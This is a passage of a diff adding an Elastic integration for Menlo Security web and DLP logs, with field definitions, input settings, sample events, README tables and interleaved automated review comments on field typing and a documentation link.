+- external: ecs
+ name: user_agent.version
diff --git a/packages/menlo/data_stream/web/fields/fields.yml b/packages/menlo/data_stream/web/fields/fields.yml
new file mode 100644
index 00000000000..ea1d7d3c652
--- /dev/null
+++ b/packages/menlo/data_stream/web/fields/fields.yml
@@ -0,0 +1,81 @@
+- name: menlo
+ type: group
+ fields:
+ - name: web
+ type: group
+ fields:
+ - name: categories
+ type: keyword
+ description: "Category Rules Category type classification"
+ - name: is_iframe
+ type: boolean
+ description: "Is inline frame (iframe) element"
+ - name: has_password
+ type: boolean
+ description: "Presence of password in form POST request"
+ - name: threat_types
+ type: keyword
+ description: "Top level risk"
+ - name: threats
+ type: keyword
+ description: "Threat type identified by Menlo Security internal data"
+ - name: request_type
+ type: keyword
+ description: "Request type"
+ - name: tally
+ type: long
+ description: "Count of risks encountered"
+ - name: ua_type
+ type: keyword
+ description: "The type of user agent"
+ - name: casb_app_name
+ type: keyword
+ description: "Cloud application name"
+ - name: cached
+ type: boolean
+ description: "Indicates whether the resource was obtained from the isolated browser’s cache (True) or by downloading from the origin server (False)"
+ - name: casb_cat_name
+ type: keyword
+ description: "Application category ID"
+ - name: casb_fun_name
+ type: keyword
+ description: "Application function name"
+ - name: casb_org_name
+ type: keyword
+ description: "Application organization name"
+ - name: casb_profile_id
+ type: keyword
+ description: "Menlo CASB profile ID"
+ - name: casb_profile_name
+ type: keyword
+ description: "Menlo CASB profile name attached to application or exception rule"
+ - name: casb_profile_type
+ type: keyword
+ description: "Menlo CASB profile type (sanctioned/unsanctioned/unclassified)"
+ - name: casb_risk_score
+ type: keyword
+ description: "Menlo risk score for application (0-10)"
+ - name: sbox
+ type: keyword
+ description: "Sandbox Inspection Result"
+ - name: sbox_mal_act
+ type: keyword
+ description: "List of malicious activities found"
+ - name: soph
+ type: keyword
+ description: "Full file scan result"
+ - name: tab_id
+ type: keyword
+ description: "Tab creation number within a surrogate"
+ - name: virus_details
+ type: keyword
+ description: "Virus detail"
+ - name: xff_ip
+ type: keyword
+ description: "X-Forwarded-For HTTP header field originating client IP address"
+ - name: content_type
+ type: keyword
+ description: "Page type"
+ - name: risk_score
+ type: keyword
+ description: "Risk calculated for URL"
diff --git a/packages/menlo/data_stream/web/manifest.yml b/packages/menlo/data_stream/web/manifest.yml
new file mode 100644
index 00000000000..7798b84d9d6
--- /dev/null
+++ b/packages/menlo/data_stream/web/manifest.yml
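Review bot: `is_iframe` is declared `type: boolean` alongside `has_password`, but the sample event added in this same commit carries `"is_iframe": "false"` as a string while `has_password` arrives as a JSON boolean, which suggests the pipeline leaves this field unconverted; the mapping will coerce the string at index time, but a `convert` processor with `type: boolean` and `ignore_missing: true` for `json.event.is_iframe` in the ingest pipeline would make the stored value match the declared type. Separately, `xff_ip` is described as the originating client IP address yet typed `keyword`; the pipeline's `!= "NA"` guard on its rename implies the vendor sends a non-IP sentinel, so if `keyword` is deliberate a short comment saying so would help the next maintainer, otherwise `type: ip` would validate the value and allow it to be appended to `related.ip`.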
@@ -0,0 +1,78 @@
+title: Collect Menlo Web from Menlo Security API
+type: logs
+streams:
+ - input: cel
+ title: Menlo Web Logs
+ description: Collect Menlo Web logs
+ template_path: input.yml.hbs
+ vars:
+ - name: batch_size
+ type: text
+ title: Batch Size
+ description: Batch size for the response of the Menlo Security API.
+ default: 1000
+ required: true
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ description: "How far back to pull the events from Menlo Security API. NOTE: Supported units for this parameter are h/m/s."
+ multi: false
+ required: true
+ show_user: true
+ default: 24h
+ - name: interval
+ type: text
+ title: Interval
+ description: "Duration between requests to the Menlo Security API. NOTE: Supported units for this parameter are h/m/s."
+ default: 1m
+ multi: false
+ required: true
+ show_user: true
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: true
+ show_user: false
+ default: 30s
+ - name: enable_request_tracer
+ type: bool
+ title: Enable request tracing
+ multi: false
+ required: false
+ show_user: false
+ description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details.
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - menlo
+ - forwarded
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+ - name: preserve_duplicate_custom_fields
+ required: true
+ show_user: false
+ title: Preserve duplicate custom fields
+ description: Preserve menlo.web fields that were copied to Elastic Common Schema (ECS) fields.
+ type: bool
+ multi: false
+ default: false
diff --git a/packages/menlo/data_stream/web/sample_event.json b/packages/menlo/data_stream/web/sample_event.json
new file mode 100644
index 00000000000..50987014771
--- /dev/null
+++ b/packages/menlo/data_stream/web/sample_event.json
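Review bot: The `enable_request_tracer` description links to the httpjson input's request tracer section (`filebeat-input-httpjson.html#_request_tracer_filename`), but this stream is declared `input: cel`, so users following the link land on the wrong input's documentation. The CEL input exposes the equivalent option as `resource.tracer.filename`; the link should point at the `filebeat-input-cel.html` page's section for that option instead. Because the tracer persists full requests and responses, which would include the authenticated request headers sent to the Menlo API, to the agent's local disk, keeping this var at `show_user: false` with the existing caution in its description is the right default.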
@@ -0,0 +1,145 @@ +{ + "@timestamp": "2023-11-21T13:12:37.102Z", + "agent": { + "ephemeral_id": "22fb9f42-0c3b-4c46-9fae-06cd89923a5b", + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.2" + }, + "client": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.3" + }, + "cloud": { + "region": "us-east-1c" + }, + "data_stream": { + "dataset": "menlo.web", + "namespace": "ep", + "type": "logs" + }, + "destination": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.1" + }, + "dns": { + "answers": { + "data": [ + "192.18.1.1" + ] + } + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "snapshot": false, + "version": "8.12.2" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "web", + "network", + "threat" + ], + "dataset": "menlo.web", + "ingested": "2024-03-28T13:32:25Z", + "kind": "alert", + "outcome": "unknown", + "reason": "a77757d5-d3be-47ab-9394-cfff5887ade4" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 308 + } + }, + "input": { + "type": "cel" + }, + "menlo": { + "web": { + "categories": "Business and Economy", + "content_type": "text/html; charset=UTF-8", + "has_password": false, + "is_iframe": "false", + "request_type": "page_request", + "risk_score": "low", + "tab_id": "1", + "tally": -1, + "ua_type": "supported_browser" + } + }, + "network": { + "protocol": "http" + }, + "observer": { + "geo": { + "country_iso_code": "US" + }, + "ip": [ + "192.18.1.2" + ], + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "ip": [ + "192.18.1.3", + "192.18.1.1" + ], + "user": [ + "example_user" + ] + }, + "server": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.1" + }, + "source": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.3" + }, + "tags": [ + "menlo", + "forwarded" + ], + "url": { + 
"domain": "elastic.co", + "original": "http://elastic.co/", + "path": "/", + "registered_domain": "elastic.co", + "scheme": "http", + "top_level_domain": "co" + }, + "user": { + "name": "example_user" + }, + "user_agent": { + "device": { + "name": "Mac" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "os": { + "full": "Mac OS X 10.15.7", + "name": "Mac OS X", + "version": "10.15.7" + }, + "version": "119.0.0.0" + } +} \ No newline at end of file diff --git a/packages/menlo/docs/README.md b/packages/menlo/docs/README.md new file mode 100644 index 00000000000..e9189d2250d --- /dev/null +++ b/packages/menlo/docs/README.md 
@@ -0,0 +1,500 @@ +# Menlo Security + +Menlo Security’s isolation-centric approach splits web browsing and document retrieval between the user’s device and an isolated, Disposable Virtual Container (DVC) away from the endpoint. All risky code is executed in the isolated DVC and never reaches the endpoint. Only safe display data is sent to the user’s browser. User traffic is automatically sent to this infrastructure without any impact on the users themselves. + +## Web + +Menlo Security's cloud based Browser Security prevents phishing and malware attacks on any browser and any device across your hybrid enterprise. + +## DLP + +Data Loss Prevention (also known as Data Leak Prevention) detects potential data breaches or data ex-filtration transmissions and prevents them by detecting and optionally blocking sensitive data passing through the Menlo Security platform. + +## Compatibility + +This module has been tested against the Menlo Security API **version 2.0** + +## Data streams + +The Menlo Security integration collects data for the following two events: + +| Event Type | +|-------------------------------| +| Web | +| DLP | + +## Setup + +To collect data through the REST API you will need your Menlo Security API URL and an API token. + +The API token to collect logs must have the *Log Export API* permission + +## Logs Reference + +### Web + +This is the `Web` dataset. 
+ +#### Example + +An example event for `web` looks as following: + +```json +{ + "@timestamp": "2023-11-21T13:12:37.102Z", + "agent": { + "ephemeral_id": "22fb9f42-0c3b-4c46-9fae-06cd89923a5b", + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.2" + }, + "client": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.3" + }, + "cloud": { + "region": "us-east-1c" + }, + "data_stream": { + "dataset": "menlo.web", + "namespace": "ep", + "type": "logs" + }, + "destination": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.1" + }, + "dns": { + "answers": { + "data": [ + "192.18.1.1" + ] + } + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "snapshot": false, + "version": "8.12.2" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "web", + "network", + "threat" + ], + "dataset": "menlo.web", + "ingested": "2024-03-28T13:32:25Z", + "kind": "alert", + "outcome": "unknown", + "reason": "a77757d5-d3be-47ab-9394-cfff5887ade4" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 308 + } + }, + "input": { + "type": "cel" + }, + "menlo": { + "web": { + "categories": "Business and Economy", + "content_type": "text/html; charset=UTF-8", + "has_password": false, + "is_iframe": "false", + "request_type": "page_request", + "risk_score": "low", + "tab_id": "1", + "tally": -1, + "ua_type": "supported_browser" + } + }, + "network": { + "protocol": "http" + }, + "observer": { + "geo": { + "country_iso_code": "US" + }, + "ip": [ + "192.18.1.2" + ], + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "ip": [ + "192.18.1.3", + "192.18.1.1" + ], + "user": [ + "example_user" + ] + }, + "server": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.1" + }, + "source": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.3" + }, 
+ "tags": [ + "menlo", + "forwarded" + ], + "url": { + "domain": "elastic.co", + "original": "http://elastic.co/", + "path": "/", + "registered_domain": "elastic.co", + "scheme": "http", + "top_level_domain": "co" + }, + "user": { + "name": "example_user" + }, + "user_agent": { + "device": { + "name": "Mac" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "os": { + "full": "Mac OS X 10.15.7", + "name": "Mac OS X", + "version": "10.15.7" + }, + "version": "119.0.0.0" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| client.geo.country_iso_code | Country ISO code. | keyword | +| client.ip | IP address of the client (IPv4 or IPv6). | ip | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. 
| constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| destination.domain | The domain name of the destination system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| destination.geo.country_iso_code | Country ISO code. | keyword | +| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | +| dns.answers.data | The data describing the resource. The meaning of this data depends on the type and class of the resource record. | keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. 
This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Event dataset. | constant_keyword | +| event.id | Unique ID to describe the event. | keyword | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. 
Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| event.reason | Reason why this event happened, according to the source. This describes the why of a particular action or outcome captured in the event. Where `event.action` captures the action from the event, `event.reason` describes why that action was taken. For example, a web proxy with an `event.action` which denied the request may also populate `event.reason` with the reason why (e.g. `blocked site`). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. 
| keyword | +| file.name | Name of the file including the extension, without the directory. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| http.request.method | HTTP request method. The value should retain its casing from the original event. For example, `GET`, `get`, and `GeT` are all considered valid values for this field. | keyword | +| http.request.mime_type | Mime type of the body of the request. 
This value must only be populated based on the content of the request body, not on the `Content-Type` header. Comparing the mime type of a request with the request's Content-Type header can be helpful in detecting threats or misconfigured clients. | keyword | +| http.request.referrer | Referrer for this HTTP request. | keyword | +| http.response.status_code | HTTP response status code. | long | +| input.type | Input type | keyword | +| log.offset | Log offset | long | +| menlo.web.cached | Indicates whether the resource was obtained from the isolated browser’s cache (True) or by downloading from the origin server (False) | boolean | +| menlo.web.casb_app_name | Cloud application name | keyword | +| menlo.web.casb_cat_name | Application category ID | keyword | +| menlo.web.casb_fun_name | Application function name | keyword | +| menlo.web.casb_org_name | Application organization name | keyword | +| menlo.web.casb_profile_id | Menlo CASB profile ID | keyword | +| menlo.web.casb_profile_name | Menlo CASB profile name attached to application or exception rule | keyword | +| menlo.web.casb_profile_type | Menlo CASB profile type (sanctioned/unsanctioned/unclassified) | keyword | +| menlo.web.casb_risk_score | Menlo risk score for application (0-10) | keyword | +| menlo.web.categories | Category Rules Category type classification | keyword | +| menlo.web.content_type | Page type | keyword | +| menlo.web.has_password | Presence of password in form POST request | boolean | +| menlo.web.is_iframe | Is inline frame (iframe) element | boolean | +| menlo.web.request_type | Request type | keyword | +| menlo.web.risk_score | Risk calculated for URL | keyword | +| menlo.web.sbox | Sandbox Inspection Result | keyword | +| menlo.web.sbox_mal_act | List of malicious activities found | keyword | +| menlo.web.soph | Full file scan result | keyword | +| menlo.web.tab_id | Tab creation number within a surrogate | keyword | +| menlo.web.tally | Count of risks encountered | long | +| 
menlo.web.threat_types | Top level risk | keyword | +| menlo.web.threats | Threat type identified by Menlo Security internal data | keyword | +| menlo.web.ua_type | The type of user agent | keyword | +| menlo.web.virus_details | Virus detail | keyword | +| menlo.web.xff_ip | X-Forwarded-For HTTP header field originating client IP address | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| network.protocol | In the OSI Model this would be the Application Layer protocol. For example, `http`, `dns`, or `ssh`. The field value must be normalized to lowercase for querying. | keyword | +| observer.geo.country_iso_code | Country ISO code. | keyword | +| observer.ip | IP addresses of the observer. | ip | +| observer.product | The product name of the observer. | keyword | +| observer.vendor | Vendor name of the observer. | keyword | +| observer.version | Observer version. | keyword | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| server.geo.country_iso_code | Country ISO code. | keyword | +| server.ip | IP address of the server (IPv4 or IPv6). | ip | +| source.geo.country_iso_code | Country ISO code. | keyword | +| source.ip | IP address of the source (IPv4 or IPv6). | ip | +| tags | List of keywords used to tag each event. | keyword | +| url.domain | Domain of the url, such as "www.elastic.co". 
In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword | +| url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| url.original.text | Multi-field of `url.original`. | match_only_text | +| url.path | Path of the request, such as "/search". | wildcard | +| url.registered_domain | The highest registered url domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword | +| url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword | +| url.subdomain | The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. | keyword | +| url.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. 
For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | +| user_agent.device.name | Name of the device. | keyword | +| user_agent.name | Name of the user agent. | keyword | +| user_agent.original | Unparsed user_agent string. | keyword | +| user_agent.original.text | Multi-field of `user_agent.original`. | match_only_text | +| user_agent.os.full | Operating system name, including the version or code name. | keyword | +| user_agent.os.full.text | Multi-field of `user_agent.os.full`. | match_only_text | +| user_agent.os.name | Operating system name, without the version. | keyword | +| user_agent.os.name.text | Multi-field of `user_agent.os.name`. | match_only_text | +| user_agent.os.version | Operating system version as a raw string. | keyword | +| user_agent.version | Version of the user agent. | keyword | + + +### DLP + +This is the `DLP` dataset. 
+ +#### Example + +An example event for `dlp` looks as following: + +```json +{ + "@timestamp": "2024-03-28T13:30:21.204Z", + "agent": { + "ephemeral_id": "1054908a-63b4-46fd-8028-f975d0f878c2", + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.2" + }, + "data_stream": { + "dataset": "menlo.dlp", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "snapshot": false, + "version": "8.12.2" + }, + "event": { + "action": "block", + "agent_id_status": "verified", + "category": [ + "intrusion_detection", + "network" + ], + "created": "2020-03-09T17:17:22.227Z", + "dataset": "menlo.dlp", + "id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "ingested": "2024-03-28T13:30:33Z", + "kind": "alert", + "outcome": "success", + "severity": 5 + }, + "file": { + "hash": { + "sha256": "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a" + }, + "name": "more_credit_cards.csv" + }, + "http": { + "request": { + "method": "GET" + } + }, + "input": { + "type": "cel" + }, + "menlo": { + "dlp": { + "alerted": "false", + "category": "Download Sites", + "ccl": { + "id": "CreditordebitcardnumbersGlobal", + "match_counts": 1, + "score": 1 + }, + "status": "dirty", + "stream_name": "/safefile-input/working_file", + "user_input": "false" + } + }, + "observer": { + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "hash": [ + "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a" + ], + "user": [ + "admin@menlosecurity.com" + ] + }, + "rule": { + "id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099", + "name": "Credit card block rule" + }, + "tags": [ + "menlo", + "forwarded" + ], + "url": { + "domain": "tinynewupload.com", + "original": "http://tinynewupload.com/", + "path": "/", + "registered_domain": "tinynewupload.com", + "scheme": "http", + 
"top_level_domain": "com" + }, + "user": { + "name": "admin@menlosecurity.com" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. 
The value is normally defined by the implementer. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Event dataset. | constant_keyword | +| event.id | Unique ID to describe the event. | keyword | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. 
| constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| file.hash.sha256 | SHA256 hash. 
| keyword | +| file.name | Name of the file including the extension, without the directory. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| http.request.method | HTTP request method. The value should retain its casing from the original event. For example, `GET`, `get`, and `GeT` are all considered valid values for this field. 
